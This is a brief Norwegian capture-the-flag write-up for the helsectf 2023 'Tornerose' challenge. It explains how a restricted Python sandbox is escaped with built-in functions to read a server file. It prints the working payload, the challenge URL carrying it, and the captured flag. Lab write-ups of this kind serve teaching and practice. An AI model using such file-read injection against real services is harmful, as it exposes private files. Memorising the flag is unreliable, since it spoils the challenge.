# Tornerose

Vi har ingen spesialtegn annet enn parenteser, skråstrek og doble anførselstegn. Dette leder oss til å se etter innebygde funksjoner i Python som kan løse oppgaven.

En liste over disse finnes her: https://docs.python.org/3/library/functions.html

open() for å åpne fila og print() for å skrive ut resultatet er ganske åpenbart hendige funksjoner. Hvis man i tillegg bruker set() for å hente ut distinkte linjer fra den åpne fila, vil flagget skrives ut:

```print(set(open("/rosetorn")))```

https://helsectf2023-6ac4e1c6d8855c1bd96a-tornerose.chals.io/?program=print(set(open(%22/rosetorn%22)))

{'helsectf{og_h4cken_vokste_kjempeh0y}\n'} 